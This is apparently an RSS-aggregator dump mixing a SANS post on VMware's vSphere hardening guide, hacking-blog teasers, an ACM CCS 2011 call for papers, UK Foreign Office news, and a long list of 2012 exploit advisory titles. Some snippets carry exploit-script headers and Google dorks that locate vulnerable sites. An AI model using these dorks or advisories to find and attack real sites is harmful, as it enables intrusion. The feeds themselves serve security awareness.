http://isc.sans.org/rssfeed_full.xml Many vendors have security hardening guides - step-by-step guides to increasing the security posture of one product or another. We alluded to the Cisco guides earlier this month (Day 11), Microsoft also makes a decent set of hardening guides for Windows server and workstation products, as do most Linux distros - you'll find that most vendors have documents of this type. VMware's vSphere hardening guide is one I use frequently. It's seen several iterations over the years - the versions considered current are all stored at: http://www.vmware.com/support/support-resources/hardening-guides.html The initial guide for ESX 3.x (back in the day) was mostly CLI based, with commands executed mostly within the Linux shell on the individual ESX hosts. Things have changed quite a bit since then (and no, that wasn't a reference to the amount of grey in my hair!), the current version (5.0) covers the entire vSphere environment, it discusses settings for the ESXi hosts, the Virtual Machine guests, the Virtual Network (and physical network), the vCenter management platform and vCenter Update Manager. From an both an auditor and a system administrator perspective, there are a number of oh so cool factors to this standard that make it a great example for vendor security documentation: There is a clear description of why you might make any specific configuration change. The security exposure is clearly explained for each setting discussed, along with the severity. Every setting is not a recommended setting. They are very clear that some security changes are recommended in all cases. Others might only be recommended for DMZ settings, or some other exceptional circumstances. For each setting, they discuss in what situation that change would be deemed neccessary Some security changes will break functionality that you might be expecting, for instance it might disable something in vcenter, or it might break vCLI (a remote cli command line api) functions. If a setting affects functionality, it is clearly spelled out. There are several ways to get the job done. For each benchmark setting, several methods for effecting that change are discussed. Often there'll be a setting to tweak within vCenter, but whenever possible they'll also discuss how to accomplish the same task from a remote command line, either from Powershell (using the PowerCLI api) or from a remote windows or linux command line (using their VCLi api command set). For instance, for something as simple as setting NTP (Network Time Protocol), they cover off: How to set NTP services up for the ESXi host in the vSphere Client application What config file is updated (/etc/ntp.conf) From the vCLI (Virtual Command Line), how to audit this setting using vicfg-ntp. Note that all the vCLI commands are run from a remote host (Linux or Windows), so this is a great audit tool! How to update this setting using the vCLI, again, using vicfg-ntp How to list the NTP settings from all hsots in an environment using PowerCLI, vMware's Powershell API. Again, this is remotely run from a Windows host with PowerShell and the VMware PowerCLI installed. How to update all hosts in an environment using PowerCL And finally, am external link for more information Audit is not neglected in this document. Not only do they tell you how to make each change, they show you how to audit that change, to get the current value of the affected settings. Again, whenever possible, they discuss how to do the audit steps from as many toolsets as possible. You'll find that if you are an auditor looking at 10 servers, or a consultant working with a different client each week, the CLI approaches have a lot of appeal. Not only are they much quicker, but they are less prone to error, and you don't have to rekey anything. So, if you are an auditor, or a consultant who sees many clients, or a System Administrator who just wants to keep tabs on their environment, from this guide you can easily and simply create your own audit scripts. With these scripts in hand you are able to get accurate, repeatable security assessments (based on a published standard) of a vSphere environment. This means that you are delivering exactly the same security assessment for each client's environment. However, while the assessment is the same each time, the recommendations will not be - remember that there is a severity value for each assessed value, and also a discussion of in which situation each setting is recommended - the recommendations will vary quite a bit from one client to the next. Even if you are an auditor within a single organization, you'll find that results will vary from one audit to the next. Remember that this is an evolving standard - recommended settings change from one version of the guide to the next. You'll also find that when you combine security assessments with risk assessments (this is almost always desired), the risk equation will change depending on how the impacts are phrased, what has happened in the organization recently, or who is involved in the discussion. Security is unique in the fact that while the questions will be consistent over time and between organizations, the answers will change. You'll see them vary over time, across versions of a product, in different deployment situations and between organizations. I think this benchmark is a good example of a standard that is well equipped to handle this shifting landscape. (You'll find the vSphere Hardening Guide covered cover-to-cover in SANSSEC579) If you have any stories this article, or on this or other vendor security guides, please share - use our comment form. =============== Rob VandenBrink Metafore (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest Buzz in the E-World. But now almost all have it. And its still fresh. Owing to the fact that its like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION DEFINING DLL According to microsoft “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination ! Microsofts WorldWide Telescope Released. May 12th, 2008 Any Star Wars , Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsofts entrant to the [...]

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement. The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security. Paper Submission Process Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference. Paper Format Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits. Tutorial Submissions Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website. Important Dates - Paper submission due: Friday, May 6, 2011 (23:59 UTC - 11) - First round reviews communicated to authors: Monday, June 20, 2011 - Author comments due on: Thursday, June 23, 2011 (23:59 UTC - 11) - Acceptance notification: Friday, July 15, 2011 - Final papers due: Thursday, August 11, 2011 GENERAL CHAIR: Yan Chen (Northwestern University, USA) PROGRAM CHAIRS: George Danezis (Microsoft Research, UK) Vitaly Shmatikov (University of Texas at Austin, USA) PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany) Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France) Dan Boneh (Stanford University, USA) Nikita Borisov (University of Illinois at Urbana-Champaign, USA) Herbert Bos (VU, Netherlands) Srdjan Capkun (ETHZ, Switzerland) Avik Chaudhuri (Adobe Advanced Technology Labs, USA) Shuo Chen (Microsoft Research, USA) Manuel Costa (Microsoft Research, UK) Anupam Datta (CMU, USA) Stephanie Delaune (CNRS and ENS-Cachan, France) Roger Dingledine (The Tor Project, USA) Orr Dunkelman (University of Haifa and Weizmann Institute, Israel) Ulfar Erlingsson (Google, USA) Nick Feamster (Georgia Tech, USA) Bryan Ford (Yale University, USA) Cedric Fournet (Microsoft Research, UK) Paul Francis (MPI-SWS, Germany) Michael Freedman (Princeton University, USA) Guofei Gu (Texas A&M University, USA) Nicholas Hopper (University of Minnesota, USA) Collin Jackson (CMU Silicon Valley, USA) Markus Jakobsson (Paypal, USA) Jaeyeon Jung (Intel Labs Seattle, USA) Apu Kapadia (Indiana University Bloomington, USA) Jonathan Katz (University of Maryland, USA) Stefan Katzenbeisser (TU Darmstadt, Germany) Arvind Krishnamurthy (University of Washington, USA) Christopher Kruegel (University of California, Santa Barbara, USA) Ralf Kuesters (University of Trier, Germany) Ninghui Li (Purdue University, USA) Benjamin Livshits (Microsoft Research, USA) Heiko Mantel (TU Darmstadt, Germany) John Mitchell (Stanford University, USA) Fabian Monrose (University of North Carolina at Chapel Hill, USA) Steven Murdoch (University of Cambridge, UK) David Naccache (Ecole Normale Superieure, France) Arvind Narayanan (Stanford University, USA) Kenny Paterson (Royal Holloway, University of London, UK) Niels Provos (Google, USA) Mike Reiter (University of North Carolina at Chapel Hill, USA) Thomas Ristenpart (University of Wisconsin, USA) Hovav Shacham (University of California, San Diego, USA) Adam Smith (Pennsylvania State University, USA) Anil Somayaji (Carleton University, Canada) Francois-Xavier Standaert (UCL, Belgium) Eran Tromer (Tel Aviv University, Israel) Leendert Van Doorn (AMD, USA) Paul Van Oorschot (Carleton University, Canada) Bogdan Warinschi (University of Bristol, UK) Brent Waters (University of Texas at Austin, USA) Robert Watson (University of Cambridge, United Kingdom) Xiaowei Yang (Duke University, USA) Haifeng Yu (National University of Singapore, Singapore)

==> Number 10 statement on Beirut attack

http://feeds.feedburner.com/FcoLatestNewsRssFeed 10 Downing Street Following the bomb attack in Lebanon today, a Number 10 spokesperson has given a statement.

==> Foreign Secretary echoes call for Eid ceasefire in Syria

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague Crown Copyright Foreign Secretary William Hague: "A ceasefire must be accompanied by genuine commitment from the Syrian regime to work with Lakhdar Brahimi to find a sustainable end to the violence in Syria".

==> This week at the Foreign Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed FCO King Charles Street, Crown Copyright A look at the work of the Foreign Office and its embassies overseas this week.

==> Foreign Secretary horrified by Lebanon bombing

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague Foreign Secretary William Hague said that this was a horrendous act that showed an appalling contempt for human life

==> Foreign Office Minister strongly condemns Israeli settlement plans

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Office Minister Alistair Burt MP Foreign Office Minister Alistair Burt has condemned Israel's plans to expand the illegal settlement of Gilo on the southern flank of East Jerusalem and urges the Israeli Government to change its approach.

==> Fourteenth Hajj Consular Delegation launches

http://feeds.feedburner.com/FcoLatestNewsRssFeed Muslim pilgrims perform the final walk (Tawaf al-Wadaa) around the Kaaba at the Grand Mosque in the Saudi holy city of Mecca. The Hajj Consular Delegation to accompany British pilgrims to Saudi Arabia was launched today by Foreign Office Minister Mark Simmonds.

==> UK-Japan Strategic Dialogue meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague meeting Koichiro Gemba Foreign Secretary William Hague met the Japanese Foreign Minister, Koichiro Gemba, for the first meeting of the new foreign policy "Strategic Dialogue" with Japan.

==> FCO has answered questions on Iran sanctions via social media

http://feeds.feedburner.com/FcoLatestNewsRssFeed As the EU announced further sanctions against Iran, the FCO answered your questions about Iran sanctions via the ‘UK for Iranians’ social media channels

==> UK to invest in a future generation of code-breakers

http://feeds.feedburner.com/FcoLatestNewsRssFeed Bletchley Park Foreign Secretary William Hague has launched a new drive to find and nurture the next generation of code-breakers and computer scientists.

==> Foreign Office gives update on countries featured in Human Rights and Democracy Report

http://feeds.feedburner.com/FcoLatestNewsRssFeed 2011 Human Rights Report The Foreign Office has published new reporting on 28 Countries of Concern, along with updates on the case study countries featured in the annual human rights report. The quarterly updates cover the period from July to September 2012.

==> Internet Explorer 9 XSS Filter Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Internet Explorer 9 XSS Filter Bypass Risk: Low Text: # Internet Explorer 9 XSS Filter Bypass # Discovered by: Jean Pascal Pereira

==> F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection Risk: Low Text:1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides se...

==> Henok CMS SQL Injection & Easy Login Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Henok CMS SQL Injection & Easy Login Vulnerability Risk: Medium Text:-=- In The Name Of God -=- -- @ Henok CMS SQL Injection & Easy Login Vulnerability ...

==> gonginteractive Web Design SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: gonginteractive Web Design SQL Injection Vulnerability Risk: Medium Text: ## gonginteractive Web Design Sql Injection Vulnerability ## + # Expl...

==> DotProject 2.1.5 XSS and SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: DotProject 2.1.5 XSS and SQL Injection Risk: Low Text:Information -- Name : XSS and SQL Injection Vulnerabilities in DotProject Software : DotProject 2.1.5 and possibly b...

==> ClipBucket 2.6 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ClipBucket 2.6 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in ClipBucket Software : ClipBucket 2.6 and possibly below. Vendor Homepa...

==> CMSMini 0.2.2 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CMSMini 0.2.2 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in CMSMini Software : CMSMini 0.2.2 and possibly below. Vendor Homepage :...

==> TaskFreak 0.6.4 XSS Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TaskFreak 0.6.4 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in TaskFreak Software : TaskFreak 0.6.4 and possibly below. Vendor Homepa...

==> WordPress Wordfence Security XSS and IAA vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: WordPress Wordfence Security XSS and IAA vulnerabilities Risk: Low Text:I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for Word...

==> CA ARCserve Backup Security Notice

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CA ARCserve Backup Security Notice Risk: Medium Text:CA20121018-01: Security Notice for CA ARCserve Backup Issued: October 18, 2012 CA Technologies support is alerting custom...

==> Campaign Enterprise 11 SQL Injection & Unauthorized Access

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Campaign Enterprise 11 SQL Injection & Unauthorized Access Risk: Medium Text:Overview Campaign Enterprise 11, by ArialSoftware (www.arialsoftware.com), "is a mass email system you install on your...

==> ManageEngine Security Manager Plus <=5.5 Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus <=5.5 Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> ManageEngine Security Manager Plus 5.5 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus 5.5 SQL Injection Risk: Medium Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> ManageEngine Security Manager Plus 5.5 Traversal

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ManageEngine Security Manager Plus 5.5 Traversal Risk: High Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> Joomla Tag SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Tag SQL Injection Risk: Medium Text: Exploit Title: Joomla tag Remote Sql Exploit dork: inurl:index.php?option=com_tag Date: [18-10-2012] Author: Dan...

==> Joomla Freestyle Support 1.9 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Freestyle Support 1.9 SQL Injection Risk: Medium Text: Exploit Title: Joomla Freestyle Support com_fss sqli Dork: N/A Date: [17-10-2012] Author: Daniel Barragan "D4NB4...

==> Joomla Commedia 3.1 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Commedia 3.1 SQL Injection Risk: Medium Text: Exploit Title: Joomla commedia Remote Exploit dork: inurl:index.php?option=com_commedia Date: [18-10-2012] Autho...

==> CMSQLITE 1.3.2 Multiple Web Vulnerabiltiies

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CMSQLITE 1.3.2 Multiple Web Vulnerabiltiies Risk: Medium Text:Title: CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies Date: == 2012-10-18 References: == http://www.vuln...

==> Oracle Database Authentication Protocol Security Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle Database Authentication Protocol Security Bypass Risk: Medium Text:Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker ca...

==> OTRS 3.1 Stored XSS Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: OTRS 3.1 Stored XSS Vulnerability Risk: Low Text:#!/usr/bin/python ''' Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Se...

==> RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Risk: High Text:Title : RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Version : 15.0.6.14 Date : 2012-10-18 Vendor : ...

==> Palo Alto Networks GlobalProtect Man-In-The-Middle

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Palo Alto Networks GlobalProtect Man-In-The-Middle Risk: Low Text: SySS-Advisory: MitM-vulnerability in Palo Alto Networks GlobalProtect Prob...

==> Unirgy uStoreLocator Magento Extension SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Unirgy uStoreLocator Magento Extension SQL Injection Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-1 > == title: SQL Injection ...

==> ModSecurity 2.6.8 multipart/invalid part ruleset bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ModSecurity 2.6.8 multipart/invalid part ruleset bypass Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-0 > == title: ModSecurity mul...

==> jCore 1.0pre Cross Site Scripting & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: jCore 1.0pre Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23107 Product: jCore Vendor: jcore.net Vulnerable Version(s): 1.0pre and probably prior Tested Version: 1....

==> ATutor AContent 1.2 XSS & Authentication & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ATutor AContent 1.2 XSS & Authentication & SQL Injection Risk: Medium Text:Advisory ID: HTB23117 Product: AContent Vendor: ATutor Vulnerable Version(s): 1.2 and probably prior Tested Version: 1.2 V...

==> Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Subrion CMS 2.2.1 XSS / CSRF / SQL Injection Risk: Medium Text:Advisory ID: HTB23113 Product: Subrion CMS Vendor: The Subrion development team Vulnerable Version(s): 2.2.1 and probably pr...

==> Pmsme SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Pmsme SQL Injection Vulnerability Risk: Medium Text: ## # Title: Powered By: Pmsme SQL Injection Vulnerability # Google Dork: inurl:"page.php?p_id=" Powered By: P...

==> SanaNet Remote Sql Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: SanaNet Remote Sql Injection Vulnerability Risk: Medium Text: Exploit Title : SanaNet Remote Sql Injection Vulnerability Author : N3TD3V!L Discovered By : Sec-Advisor...

==> Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks Risk: Low Text:1. OVERVIEW Credential leaks lead to complete compromise of home automation system 2. BACKGROUND The 2 devices are id...

==> Wordpress Social Discussions Plugin Multiple Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Social Discussions Plugin Multiple Vulnerabilities Risk: Medium Text:[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin == Author: Janek Vind "waraxe"...

==> Oracle WebCenter Sites Multiple vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Oracle WebCenter Sites Multiple vulnerabilities Risk: Low Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-2 > == title: Multiple vulner...

==> Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure Risk: High Text: Vulnerable software: Videosmate Organizer V 4.2 (all versions) Vendor: http://videosmate.com/ Software License: Commercial...

==> MyBB Profile Albums 0.9 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Profile Albums 0.9 SQL Injection Risk: Medium Text:# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day # Google Dork: inurl:albums.php intext:"powered by Mybb" # Dat...

==> Sisfokol 4.0 Shell Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Sisfokol 4.0 Shell Upload Risk: High Text:Undergroundthalo Hacking Team - Security Advisory Release Date. 13-Okt-2012 Last Update. - ...

==> TinyWebGallery 1.8.3 Remote Command Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TinyWebGallery 1.8.3 Remote Command Execution Risk: High Text:TinyWebGallery 1.8.3 Remote Command Execution [] > Date : 05- 01- 2012 [] > Author : ...

==> CakePHP 2.2.0-RC2 XXE Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: CakePHP 2.2.0-RC2 XXE Injection Risk: Medium Text:# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x ...

==> MangosWeb SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MangosWeb SQL Injection Vulnerability Risk: Medium Text:EXPLOIT TITLE: MangosWeb SQL Vulnerability DATE: 1/7/2012 BY Hood3dRob1n AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3...

==> Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities Risk: Medium Text:# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindi...

==> Wordpress Plugin BackWPup 1.6.1 Remote auth bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Wordpress Plugin BackWPup 1.6.1 Remote auth bypass Risk: High Text:Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. ...

==> web - Joomla Component com_kunena - SQL Injection Vulnerability / Cross-Site Scripting

http://www.1337day.com/rss

==> web - Zip Code Locator - CSRF/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - Peruestudio - SQL Injection Vulnerability / LFI

http://www.1337day.com/rss

==> web - NetBoot - SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - RealPlayer 15.0.6.14 (.3GP) Arbitrary Code Execution POC

http://www.1337day.com/rss

==> web - ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

http://www.1337day.com/rss

==> remote - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

http://www.1337day.com/rss

==> remote - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

http://www.1337day.com/rss

==> web - AdaptCMS 2.0.4 CSRF Vulnerability

http://www.1337day.com/rss

==> local - BestPlay v4.1 (.mp3) Crash PoC

http://www.1337day.com/rss

==> web - Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure

http://www.1337day.com/rss

==> web - jCore 1.0pre Cross Site Scripting / SQL Injection

http://www.1337day.com/rss

==> web - WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure WordPress Slideshow 2.1.12 Cross Site Scripting / Path Disclosure

http://www.1337day.com/rss

==> web - BSW Gallery Shell Upload Vulnerability

http://www.1337day.com/rss

==> web - Amateur Photographer 's Image Gallery 0.9a XSS / SQL Injection

http://www.1337day.com/rss

==> web - OTRS 3.1 Stored XSS Vulnerability

http://www.1337day.com/rss

==> web - Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://www.1337day.com/rss

==> web - Joomla Component com_commedia SQL Injection Exploit

http://www.1337day.com/rss

==> web - Joomla Freestyle Support com_fss SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Joomla Component com_tag SQL Injection Exploit

http://www.1337day.com/rss

==> web - Legrand-003598 / Bticino-F454 Credential Disclosure

http://www.1337day.com/rss

==> dos / - Internet Explorer 9 XSS Filter Bypass

http://www.1337day.com/rss

==> local - Oracle Database Authentication Protocol Security Bypass

http://www.1337day.com/rss

==> web - PHP-eSeller SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Visual Tools DVR Command Injection / Password Disclosure

http://www.1337day.com/rss

==> web - PBBoard 3.0.0 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - ManageEngine Support Center Plus <= 7908 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Symphony CMS 2.3 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Sisfokol 4.0 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Desarrollo Web Peru - Default Login Access / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - UvumiTools Crop 2.0.0 - Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - BigPond 3G21WB Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Cartweaver 3 Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - AjaXplorer checkInstall.php Remote Command Execution

http://www.1337day.com/rss

==> dos / - QQPlayer 3.7.892 m2p quartz.dll heap pointer overwrite PoC

http://www.1337day.com/rss

==> local - Huawei Technologies Internet Mobile Unicode SEH Exploit

http://www.1337day.com/rss

==> local - Windows Escalate Service Permissions Local Privilege Escalation

http://www.1337day.com/rss

==> web - WebGin SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Cisco WebEx .wrf Memory Corruption

http://www.1337day.com/rss

==> remote - Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit

http://www.1337day.com/rss

==> web - Atarim SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - KeyHelp ActiveX LaunchTriPane Remote Code Execution

http://www.1337day.com/rss

==> remote - Project Pier Arbitrary File Upload

http://www.1337day.com/rss

==> local - PHP 5.3.4 com_event_sink 0-Day

http://www.1337day.com/rss

==> local - Apple iOS Default SSH Password

http://www.1337day.com/rss

==> web - Spicy E-commerce - SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - PhpTax pfilez Parameter Exec Remote Code Injection

http://www.1337day.com/rss

==> web - TECNO DYNAMICS - Sql injection / Local File Include Vulnerabilities

http://www.1337day.com/rss

==> dos / - Gom Player 2.1.44.5123 (Unicode) NULL pointer dereference vulnerability

http://www.1337day.com/rss

==> dos / - FL Studio 10 Producer Edition SEH Based Buffer Overflow PoC

http://www.1337day.com/rss

==> local - PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow

http://www.1337day.com/rss

==> local - VLC Player 2.0.3 <= ReadAV Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - Avaya WinPMD UniteHostRouter Buffer Overflow

http://www.1337day.com/rss

==> remote - Avaya IP Office Customer Call Reporter Command Execution

http://www.1337day.com/rss

==> web - ServersCheck Monitoring Software v9.0.12 / 9.0.14 - Stored XSS

http://www.1337day.com/rss

==> local - Windows Escalate UAC Execute RunAs

http://www.1337day.com/rss

==> remote - Oracle Business Transaction Management FlashTunnelService Remote Code Execution

http://www.1337day.com/rss

==> remote - HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution

http://www.1337day.com/rss

==> web - Viral Membership System Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - site2host (cms.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Arctic Torrent 1.2.3 <= Remote Memory Corruption

http://www.1337day.com/rss

==> web - Web Help Desk XSS Vulnerability

http://www.1337day.com/rss

==> web - live church streaming (events.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - Apple iOS MobileMail LibTIFF Buffer Overflow

http://www.1337day.com/rss

==> web - Blog Mod <= 0.1.9 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Get Short & Protected Link Remote String Based SQLi (perl)

http://www.1337day.com/rss

==> web - Cims empdata.mdb Database Disclosure Exploit

http://www.1337day.com/rss

==> web - MythPhp CSRF Change User Password Vulnerability

http://www.1337day.com/rss

==> local - Windows Escalate UAC Protection Bypass

http://www.1337day.com/rss

==> web - Epop Studio sql injection Vulnerability

http://www.1337day.com/rss

==> web - WordPress Shopp v1.0.17 - eCommerce Plugin <= XSS/LFI Vulnerabilities

http://www.1337day.com/rss

==> local - FastStone Image Viewer 4.6 <= ReadAVonIP Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - QNX QCONN Remote Command Execution Vurnerability (2)

http://www.1337day.com/rss

==> web - Oracle Identity Management 10g Cross Site Scripting

http://www.1337day.com/rss

==> web - Template CMS 2.1.1 Cross Site Request Forgery / Cross Site Scripting

http://www.1337day.com/rss

==> web - phpMyBitTorrent 2.04 SQL Injection / Local File Inclusion

http://www.1337day.com/rss

==> web - phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities

http://www.1337day.com/rss

==> web - Joomla Component com_huruhelpdesk Remote SQL Injection Vulnerability

http://www.1337day.com/rss

